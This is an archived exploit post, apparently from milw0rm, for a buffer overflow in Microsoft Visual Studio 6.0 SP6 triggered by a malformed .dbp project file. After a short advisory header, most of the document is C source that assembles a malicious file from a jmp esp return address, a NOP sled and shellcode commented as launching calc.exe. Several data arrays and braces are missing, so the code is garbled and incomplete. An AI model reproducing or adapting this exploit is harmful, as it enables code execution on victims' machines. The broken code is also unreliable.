Microsoft Visual Studio 6.0 Sp6 Malformed .dbp File BoF Exploit by Kozan
Bug Discovered and Exploit Coded by: Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com
Affected Vendor:
Microsoft (www.microsoft.com)
Affected Products:
Microsoft Visual Studio 6.0 (with latest Service Pack 6)
Microsoft Development Environment 6.0 (SP6) (Microsoft Visual InterDev 6.0)
Vulnerability Details:
A Buffer Overflow Vulnerability is exists for the following file formats
of affected product.
Visual Studio Database Project File (.dbp)
Visual Studio Solution (.sln)
Original Advisory and Technical Details:
#include <windows.h>
#include <stdio.h>
char szHeaderBlock[] =
// 0x4656b8c3 - jmp esp - VSSLN.DLL
char szEip[] = "\xc3\xb8\x56\x46";
char szTrashCode[] =
// invoke calc.exe
char szShellCode[] =
char szTrashCode2[] =
char szFooterBlock[] = "\x22\x0D\x0A\x45\x6E\x64\x0D\x0A";
int main()
fprintf(stdout, "\r\n\r\n"
"Microsoft Visual Studio 6.0 Sp6 Malformed .dbp File BoF Exploit by Kozan\n"
"Bug Discovered and Exploit Coded by:Kozan\n"
"Credits to ATmaCA\n"
"www.spyinstructors.com - kozan@spyinstructors.com\n"
int nBufLen = sizeof(szHeaderBlock) +
sizeof(szFooterBlock) +
sizeof(szTrashCode) +
sizeof(szTrashCode2) +
sizeof(szEip) +
sizeof(szShellCode) - 6;
char *pszFileBuf = (char*)malloc(nBufLen);
memset(pszFileBuf, 0x90, nBufLen);
memcpy(pszFileBuf, szHeaderBlock, sizeof(szHeaderBlock)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1, szEip, sizeof(szEip)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1+sizeof(szEip)-1, szTrashCode, sizeof(szTrashCode)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1+sizeof(szEip)-1+sizeof(szTrashCode)-1, szShellCode, sizeof(szShellCode)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1+sizeof(szEip)-1+sizeof(szTrashCode)-1+sizeof(szShellCode)-1, szTrashCode2, sizeof(szTrashCode2)-1);
memcpy(pszFileBuf+sizeof(szHeaderBlock)-1+sizeof(szEip)-1+sizeof(szTrashCode)-1+sizeof(szShellCode)-1+sizeof(szTrashCode2)-1, szFooterBlock, sizeof(szFooterBlock)-1);
FILE *fp;
if( (fp = fopen("c:\\vuln.dbp","a+b")) == NULL )
fprintf( stderr, "[Error]\t: Can not create c:\\vuln.dbp file!\r\n");
return -1;
fwrite(pszFileBuf, nBufLen, 1, fp);
fprintf( stdout, "[Completed]\t: c:\\vuln.dbp file created successfuly. Open it to test...\r\n");
return 0;
// milw0rm.com [2006-03-05]